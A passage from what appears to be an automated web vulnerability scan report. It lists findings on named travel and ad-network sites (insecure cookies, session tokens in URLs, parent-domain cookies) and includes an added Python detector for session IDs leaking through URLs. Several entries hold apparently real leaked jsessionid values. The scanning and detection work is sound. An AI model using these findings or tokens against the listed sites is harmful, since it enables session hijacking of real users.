8.108. http://ak-static.hotwirestatic.com/static/images/hotel/details/about-your-hotel-headline.gif [REST URL parameter 2]

8.109. http://ak-static.hotwirestatic.com/static/images/hotel/details/about-your-hotel-headline.gif [REST URL parameter 3]

8.110. http://ak-static.hotwirestatic.com/static/images/hotel/details/about-your-hotel-headline.gif [REST URL parameter 4]

8.111. http://ak-static.hotwirestatic.com/static/images/hotel/details/about-your-hotel-headline.gif [REST URL parameter 5]

8.112. http://ak-static.hotwirestatic.com/static/images/hotel/details/car_icon.jpg [REST URL parameter 1]

8.113. http://ak-static.hotwirestatic.com/static/images/hotel/details/car_icon.jpg [REST URL parameter 2]

8.114. http://ak-static.hotwirestatic.com/static/images/hotel/details/car_icon.jpg [REST URL parameter 3]

8.115. http://ak-static.hotwirestatic.com/static/images/hotel/details/car_icon.jpg [REST URL parameter 4]

8.116. http://ak-static.hotwirestatic.com/static/images/hotel/details/car_icon.jpg [REST URL parameter 5]

8.117. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png [REST URL parameter 1]

8.118. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png [REST URL parameter 2]

8.119. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png [REST URL parameter 3]

8.120. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png [REST URL parameter 4]

8.121. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners-with-opaque-gradient.png [REST URL parameter 5]

8.122. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners.png [REST URL parameter 1]

8.123. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners.png [REST URL parameter 2]

8.124. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners.png [REST URL parameter 3]

8.125. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners.png [REST URL parameter 4]

8.126. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-curved-corners.png [REST URL parameter 5]

8.127. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-gradient-for-details-sections.png [REST URL parameter 1]

8.128. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-gradient-for-details-sections.png [REST URL parameter 2]

8.129. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-gradient-for-details-sections.png [REST URL parameter 3]

8.130. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-gradient-for-details-sections.png [REST URL parameter 4]

8.131. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-bottom-gradient-for-details-sections.png [REST URL parameter 5]

8.132. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-gradient-opaque-price-info-module.png [REST URL parameter 1]

8.133. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-gradient-opaque-price-info-module.png [REST URL parameter 2]

8.134. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-gradient-opaque-price-info-module.png [REST URL parameter 3]

8.135. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-gradient-opaque-price-info-module.png [REST URL parameter 4]

8.136. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-gradient-opaque-price-info-module.png [REST URL parameter 5]

8.137. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large.png [REST URL parameter 1]

8.138. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large.png [REST URL parameter 2]

8.139. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large.png [REST URL parameter 3]

8.140. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large.png [REST URL parameter 4]

8.141. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large.png [REST URL parameter 5]

8.142. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png [REST URL parameter 1]

8.143. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png [REST URL parameter 2]

8.144. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png [REST URL parameter 3]

8.145. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png [REST URL parameter 4]

8.146. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-opaque-price-lockup-bg-new-large_cap.png [REST URL parameter 5]

8.147. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-retail-tabs-on.png [REST URL parameter 1]

8.148. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-retail-tabs-on.png [REST URL parameter 2]

8.149. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-retail-tabs-on.png [REST URL parameter 3]

8.150. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-retail-tabs-on.png [REST URL parameter 4]

8.151. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-retail-tabs-on.png [REST URL parameter 5]

8.152. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-top-curved-corners.png [REST URL parameter 1]

8.153. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-top-curved-corners.png [REST URL parameter 2]

8.154. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-top-curved-corners.png [REST URL parameter 3]

8.155. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-top-curved-corners.png [REST URL parameter 4]

8.156. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-top-curved-corners.png [REST URL parameter 5]

8.157. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bkgd.gif [REST URL parameter 1]

8.158. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bkgd.gif [REST URL parameter 2]

8.159. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bkgd.gif [REST URL parameter 3]

8.160. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bkgd.gif [REST URL parameter 4]

8.161. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bkgd.gif [REST URL parameter 5]

8.162. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bottom.gif [REST URL parameter 1]

8.163. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bottom.gif [REST URL parameter 2]

8.164. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bottom.gif [REST URL parameter 3]

8.165. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bottom.gif [REST URL parameter 4]

8.166. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bottom.gif [REST URL parameter 5]

8.167. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Top.gif [REST URL parameter 1]

8.168. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Top.gif [REST URL parameter 2]

8.169. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Top.gif [REST URL parameter 3]

8.170. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Top.gif [REST URL parameter 4]

8.171. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Top.gif [REST URL parameter 5]

8.172. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripAdvisorLogo.gif [REST URL parameter 1]

8.173. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripAdvisorLogo.gif [REST URL parameter 2]

8.174. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripAdvisorLogo.gif [REST URL parameter 3]

8.175. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripAdvisorLogo.gif [REST URL parameter 4]

8.176. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripAdvisorLogo.gif [REST URL parameter 5]

8.177. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png [REST URL parameter 1]

8.178. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png [REST URL parameter 2]

8.179. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png [REST URL parameter 3]

8.180. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png [REST URL parameter 4]

8.181. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png [REST URL parameter 5]

8.182. http://ak-static.hotwirestatic.com/static/images/hotel/details/tripadvisor-ratings/tripAdvisorRating.png [REST URL parameter 6]

8.183. http://ak-static.hotwirestatic.com/static/images/map-console/icons/airport-icon.gif [REST URL parameter 1]

8.184. http://ak-static.hotwirestatic.com/static/images/map-console/icons/airport-icon.gif [REST URL parameter 2]

8.185. http://ak-static.hotwirestatic.com/static/images/map-console/icons/airport-icon.gif [REST URL parameter 3]

8.186. http://ak-static.hotwirestatic.com/static/images/map-console/icons/airport-icon.gif [REST URL parameter 4]

8.187. http://ak-static.hotwirestatic.com/static/images/map-console/icons/airport-icon.gif [REST URL parameter 5]

8.188. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.0.gif [REST URL parameter 1]

8.189. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.0.gif [REST URL parameter 2]

8.190. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.0.gif [REST URL parameter 3]

8.191. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.0.gif [REST URL parameter 4]

8.192. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.5.gif [REST URL parameter 1]

8.193. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.5.gif [REST URL parameter 2]

8.194. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.5.gif [REST URL parameter 3]

8.195. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/3.5.gif [REST URL parameter 4]

8.196. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/4.0.gif [REST URL parameter 1]

8.197. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/4.0.gif [REST URL parameter 2]

8.198. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/4.0.gif [REST URL parameter 3]

8.199. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/4.0.gif [REST URL parameter 4]

8.200. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/overall/3.5.gif [REST URL parameter 1]

8.201. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/overall/3.5.gif [REST URL parameter 2]

8.202. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/overall/3.5.gif [REST URL parameter 3]

8.203. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/overall/3.5.gif [REST URL parameter 4]

8.204. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/overall/3.5.gif [REST URL parameter 5]

8.205. http://ak-static.hotwirestatic.com/static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png [REST URL parameter 1]

8.206. http://ak-static.hotwirestatic.com/static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png [REST URL parameter 2]

8.207. http://ak-static.hotwirestatic.com/static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png [REST URL parameter 3]

8.208. http://ak-static.hotwirestatic.com/static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png [REST URL parameter 4]

8.209. http://ak-static.hotwirestatic.com/static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png [REST URL parameter 5]

8.210. http://ak-static.hotwirestatic.com/static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png [REST URL parameter 6]

8.211. http://lb-static1-1568763564.us-east-1.elb.amazonaws.com/pix.gif [REST URL parameter 1]

8.212. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 1]

8.213. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 2]

8.214. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 3]

8.215. http://vox-static.liverail.com/swf/v4/admanager.swf [REST URL parameter 1]

8.216. http://vox-static.liverail.com/swf/v4/admanager.swf [REST URL parameter 2]

8.217. http://vox-static.liverail.com/swf/v4/admanager.swf [REST URL parameter 3]

8.218. http://wac.edgecastcdn.net/800003/origin.edgecast.com/cx/cdx10b.js [REST URL parameter 1]

8.219. http://wac.edgecastcdn.net/800003/origin.edgecast.com/cx/cdx10b.js [REST URL parameter 2]

8.220. http://www.hublot.com/en/cmds/stats.xml.php [REST URL parameter 1]

8.221. http://www.hublot.com/en/cmds/stats.xml.php [REST URL parameter 2]

8.222. http://www.hublot.com/en/cmds/stats.xml.php [REST URL parameter 3]

8.223. http://www.nike.com/nikefootball/home/twitterfeed [REST URL parameter 3]

8.224. http://www.tripadvisor.com/Commerce [src parameter]

9. SSL cookie without secure flag set

9.1. https://go.americanexpress-travel.com/SSOAuthenticateResponse.do

9.2. https://go.americanexpress-travel.com/hotel/HotelAvailability.do

9.3. https://go.americanexpress-travel.com/hotel/HotelCobrand.do

9.4. https://secure.mlb.com/resetPassword.do

9.5. https://secure.mlb.com/shared/scripts/bam/bam.env.jsp

9.6. https://secure.mlb.com/style/bam.css.jsp

9.7. https://secure.mlb.com/style/nav_2011.jsp

9.8. https://www.hotelplanner.com/Accept/Reserve.cfm

10. Session token in URL

10.1. http://a.intentmedia.net/adServer/impressions

10.2. http://bh.contextweb.com/bh/set.aspx

10.3. http://cert.travelocity.com/___waseq.img

10.4. http://cm.g.doubleclick.net/pixel

10.5. http://cm.g.doubleclick.net/pixel

10.6. http://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log

10.7. http://gcm.chango.com/collector/relator

10.8. https://go.americanexpress-travel.com/hotel/HotelCobrand.do

10.9. http://l.sharethis.com/pview

10.10. http://lb-static1-1568763564.us-east-1.elb.amazonaws.com/pix.gif

10.11. http://maps.googleapis.com/maps/api/js/StaticMapService.GetMapImage

10.12. http://orbitz.tt.omtrdc.net/m2/orbitz/mbox/standard

10.13. http://orbitzaway.tt.omtrdc.net/m2/orbitzaway/mbox/standard

10.14. http://orbitzaway.tt.omtrdc.net/m2/orbitzaway/sc/standard

10.15. http://rs.gwallet.com/r1/pixel/x1743

10.16. http://travel.travelocity.com/___waseq.img

10.17. http://travel.travelocity.com/hotel/HotelAvailability.do

10.18. http://travel.travelocity.com/hotel/HotelDetail.do

10.19. http://travel.travelocity.com/pub/gwt/hotel/esf/3EF72E9199C4983B05BF027C4F5C4217.cache.html

10.20. http://travel.travelocity.com/pub/gwt/hotel/esf/NoCacheAction.do

10.21. http://travel.travelocity.com/pub/gwt/hotel/esf/hotelresultlist.gwt-rpc

10.22. http://travela.priceline.com/hotel/leaveBehindPop.do

10.23. http://travela.priceline.com/hotel/newHotelSearch.do

10.24. http://travela.priceline.com/hotel/searchHotels.do

10.25. http://travela.priceline.com/hotel/searchResults.do

10.26. http://travelocity.tt.omtrdc.net/m2/travelocity/mbox/standard

10.27. http://www.facebook.com/extern/login_status.php

10.28. http://www.priceline.com/hotels/Lang/en-us/retail/retail_bounce.asp

10.29. http://www.priceline.com/hotels/Lang/en-us/retail/retail_bounce.asp

10.30. http://www.priceline.com/hotels/lang/en-us/itinerary.asp

10.31. http://www.priceline.com/hotels/lang/en-us/itinerary.asp
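
The "Session token in URL" findings above are of two shapes: a Java `;jsessionid=` path parameter on the booking pages, and the same URL double-encoded inside a `dref=` segment of an ad or tracking request. The following script is an added example written for this page, not the XSS.CX crawler's own logic: it pulls `name=value` pairs out of the path, the path segments and the query string, decodes a second layer where a parameter carries another URL, and flags values that look like session identifiers. The parameter-name list, the token heuristic and the sample URLs (which use example.com hosts and made-up IDs) are assumptions.

```python
"""Added example: flag session identifiers that travel in URLs.

Illustrative code written for this page, not the scanner logic that
produced the findings above. The parameter-name list and the token
heuristic are assumptions; tune both for the application under test.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumed list of parameter names that commonly carry a session identifier.
SESSION_PARAM_NAMES = {
    "jsessionid", "phpsessid", "sessionid", "session_id", "sessid",
    "session", "sid", "cfid", "cftoken", "token", "auth",
}
# Classic ASP names its session cookie ASPSESSIONID followed by 8 letters.
ASP_SESSION_RE = re.compile(r"^aspsessionid[a-z]{8}$", re.I)
# Java servlet containers accept the session ID as a path parameter:
#   /hotel/HotelDetail.do;jsessionid=<id>.<route>?tab=guide
PATH_PARAM_RE = re.compile(r";(?P<name>[A-Za-z_][\w-]*)=(?P<value>[^;/?#]+)")


def is_session_param(name: str) -> bool:
    lname = name.lower()
    return lname in SESSION_PARAM_NAMES or ASP_SESSION_RE.match(lname) is not None


def looks_like_token(value: str) -> bool:
    """Heuristic: session IDs are long and opaque; '12' is a record id, not a session."""
    core = value.split(".", 1)[0]  # drop a Tomcat-style ".p0617" route suffix
    return len(core) >= 16 and re.fullmatch(r"[A-Za-z0-9_\-]+", core) is not None


def _candidates(parts):
    """Yield (location, name, value) for every name=value pair in path and query."""
    for m in PATH_PARAM_RE.finditer(parts.path):
        yield "path-param", m.group("name"), m.group("value")
    # Some ad servers encode key=value pairs as path segments (/site=1/dref=.../).
    for seg in parts.path.split("/"):
        if "=" in seg and ";" not in seg:
            name, value = seg.split("=", 1)
            yield "path-segment", name, unquote(value)
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        yield "query", name, value


def find_session_tokens(url: str, _depth: int = 0) -> list:
    """Return (location, name, value) triples for session-like tokens in `url`.

    Referrer-style parameters that embed another URL (often double-encoded by
    tracking pixels) are decoded once more and scanned recursively: a session
    ID leaks just as badly when it rides inside an ad request.
    """
    findings = []
    parts = urlsplit(url)
    for loc, name, value in _candidates(parts):
        if is_session_param(name) and looks_like_token(value):
            findings.append((loc, name, value))
        nested = unquote(value)  # second decode layer for %253A-style values
        if _depth < 3 and nested.lower().startswith(("http://", "https://")):
            for nloc, nname, nvalue in find_session_tokens(nested, _depth + 1):
                findings.append((f"{loc}:{name}>{nloc}", nname, nvalue))
    return findings


# Constructed sample URLs (not captured traffic), modelled on the shapes in the report.
SAMPLE_URLS = [
    "http://travel.example.com/hotel/HotelDetail.do;jsessionid=A1B2C3D4E5F60718293A4B5C6D7E8F90.p0617?tab=guide&propertyId=4810",
    "http://ads.example.net/site=1/size=160600/dref=http%253A%252F%252Ftravel.example.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253DA1B2C3D4E5F60718293A4B5C6D7E8F90.p0617%253Ftab%253Dguide",
    "http://shop.example.org/cart.php?PHPSESSID=0123456789abcdef0123456789abcdef&item=42",
    "http://www.example.com/hotel/details.html?id=4810&sid=12",
]


def scan(urls) -> dict:
    """Map each URL to its findings; URLs without findings are omitted."""
    return {u: f for u in urls if (f := find_session_tokens(u))}


if __name__ == "__main__":
    for url, hits in scan(SAMPLE_URLS).items():
        print(url)
        for loc, name, value in hits:
            print(f"  [{loc}] {name}={value}")
```

The nested scan is what matters for the advertising.com entries in section 13 below: the booking site's own URL is clean once the cookie is used, but the `jsessionid` still reaches a third party through the `dref` parameter, so the fix is to stop URL rewriting at the container (cookie-only session tracking), not just to strip the ID from links.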

11. Password field submitted using GET method

12. ASP.NET ViewState without MAC enabled

13. Cookie scoped to parent domain

13.1. http://api.twitter.com/1/statuses/user_timeline.json

13.2. http://as00.estara.com/fs/rules.php

13.3. https://secure.mlb.com/resetPassword.do

13.4. https://secure.mlb.com/shared/scripts/bam/bam.env.jsp

13.5. https://secure.mlb.com/style/bam.css.jsp

13.6. https://secure.mlb.com/style/nav_2011.jsp

13.7. http://travela.priceline.com/hotel/leaveBehindPop.do

13.8. http://travela.priceline.com/hotel/searchHotels.do

13.9. http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information

13.10. http://www.expedia.com/Details

13.11. http://www.expedia.com/Hotel-Search

13.12. http://www.expedia.com/Hotel-Search-WidgetInitJS

13.13. http://www.expedia.com/Hotels/Offers

13.14. http://www.expedia.com/Hotels/Offers

13.15. http://www.getaroom.com/

13.16. http://www.getaroom.com/browse/market_deals

13.17. http://www.getaroom.com/searches/show

13.18. http://www.getaroom.com/washington-dc

13.19. http://www.priceline.com/QP.asp

13.20. http://www.priceline.com/hotels/lang/en-us/itinerary.asp

13.21. http://www.tripadvisor.com/CheckMore

13.22. http://www.tripadvisor.com/Commerce

13.23. http://www.tripadvisor.com/HotelCheckRates

13.24. http://www.tripadvisor.com/SmartDeals-g1-m11893

13.25. http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html

13.26. http://www.tripadvisor.com/img/cdsi/img2/ratings/partner/e5.0-13878-5.gif

13.27. http://www.tripadvisor.com/img/cdsi/img2/ratings/traveler/3.0-11539-1.gif

13.28. http://www.tripadvisor.com/img/cdsi/img2/ratings/traveler/4.0-11539-1.gif

13.29. http://www.tripadvisor.com/img/cdsi/langs/en/tripadvisor_logo_207x51-12811-0.gif

13.30. http://www.tripadvisor.com/img/cdsi/partner/tripAdvisorLogo-11007-0.gif

13.31. http://a.collective-media.net/adj/cm.guardian/

13.32. http://a.collective-media.net/cmadj/cm.guardian/

13.33. http://a.tribalfusion.com/displayAd.js

13.34. http://a.tribalfusion.com/i.cid

13.35. http://a.tribalfusion.com/j.ad

13.36. http://a.tribalfusion.com/z/i.cid

13.37. http://ad.doubleclick.net/ad/N270.N270.EMEA_StratDev/B3867719.15

13.38. http://ad.doubleclick.net/adi/N6010.456584.XAXIS.COM/B5752701.15

13.39. http://ad.doubleclick.net/adi/N6054.Invitemedia.com/B5912738.28

13.40. http://ad.doubleclick.net/adj/N3285.advertisingcom/B2343920.49

13.41. http://ad.doubleclick.net/adj/N4359.advertising.comOX2601/B5797640.2

13.42. http://ad.doubleclick.net/adj/N4610.153021.INTERCLICKNETWORK/B5581164.6

13.43. http://ad.doubleclick.net/adj/gna.en/level2

13.44. http://ad.doubleclick.net/clk

13.45. http://ads.pointroll.com/PortalServe/

13.46. http://ads2.adbrite.com/v0/ad

13.47. http://adserver.teracent.net/tase/ad

13.48. http://amch.questionmarket.com/adsc/d928398/20/44069375/decide.php

13.49. http://api.wipmania.com/jsonp

13.50. http://apis.google.com/js/plusone.js

13.51. http://ar.voicefive.com/b/wc_beacon.pli

13.52. http://ar.voicefive.com/bmx3/broker.pli

13.53. http://as.chango.com/links/adunit/1.31759988192e+12

13.54. http://as00.estara.com/fs/ruleaction.php

13.55. http://as00.estara.com/fs/rules.php

13.56. http://asset.userfly.com/users/20826/userfly.js

13.57. http://ats.tumri.net/ats/ats

13.58. http://b.scorecardresearch.com/b

13.59. http://b.scorecardresearch.com/p

13.60. http://b.scorecardresearch.com/r

13.61. http://b.voicefive.com/b

13.62. http://bh.contextweb.com/bh/rtset

13.63. http://bh.contextweb.com/bh/set.aspx

13.64. http://bid.openx.net/json

13.65. http://cas.criteo.com/delivery/admeld_map

13.66. http://clk.atdmt.com/go/352348532/direct

13.67. http://d.agkn.com/iframe!t=1168!

13.68. http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI

13.69. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2944787775510337379/mchpid/3/url/

13.70. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/2944787775510337379/mchpid/9/url/

13.71. http://d.xp1.ru4.com/meta

13.72. http://d7.zedo.com/img/bh.gif

13.73. http://ehg-twi.hitbox.com/HG

13.74. http://ehg-twi.hitbox.com/HGct

13.75. http://ff.connextra.com/BlueSquare/selector/client

13.76. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/985248306/

13.77. http://i.w55c.net/ping_match.gif

13.78. http://image2.pubmatic.com/AdServer/Pug

13.79. http://images.hotelplanner.com/hotelimages/s/028000/028920A-thumb.jpg

13.80. http://int.teracent.net/tase/int

13.81. http://int.teracent.net/tase/int

13.82. http://leadback.advertising.com/adcedge/lb

13.83. http://leadback.hotwire.db.advertising.com/adcedge/lb

13.84. http://lm.trafficmp.com/clicksense/pixel

13.85. http://loadm.exelator.com/load/

13.86. http://m.xp1.ru4.com/ad

13.87. http://m.xp1.ru4.com/meta

13.88. http://m.xp1.ru4.com/meta

13.89. http://m.xp1.ru4.com/meta

13.90. http://o-va1.wtp101.com/imp

13.91. http://o-va3.wtp101.com/imp

13.92. http://optimized-by.rubiconproject.com/a/7743/12359/21900-15.js

13.93. http://optimized-by.rubiconproject.com/a/7743/12359/21900-2.js

13.94. http://optimized-by.rubiconproject.com/a/7743/12359/21900-9.js

13.95. http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html

13.96. http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html

13.97. http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html

13.98. http://optimized-by.rubiconproject.com/a/8154/13209/25051-1.js

13.99. http://optimized-by.rubiconproject.com/a/8154/13209/25051-15.js

13.100. http://optimized-by.rubiconproject.com/a/8154/13209/25051-8.js

13.101. http://optimized-by.rubiconproject.com/a/dk.js

13.102. http://pixel.rubiconproject.com/di.php

13.103. http://pixel.rubiconproject.com/tap.php

13.104. http://r.openx.net/set

13.105. http://r.turn.com/r/beacon

13.106. http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/

13.107. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC85/rnd/xuPpW

13.108. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8z/

13.109. http://r1-ads.ace.advertising.com/site=793631/size=160600/u=2/bnum=63830787/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149

13.110. http://r1-ads.ace.advertising.com/site=793631/size=160600/u=2/bnum=74948035/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

13.111. http://r1-ads.ace.advertising.com/site=793633/size=728090/u=2/bnum=55878431/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

13.112. http://r1-ads.ace.advertising.com/site=797434/size=300250/u=2/bnum=24812117/hr=20/hl=8/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.igougo.com%252Fabout%252F

13.113. http://r1-ads.ace.advertising.com/site=812162/size=160600/u=2/bnum=34930016/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149

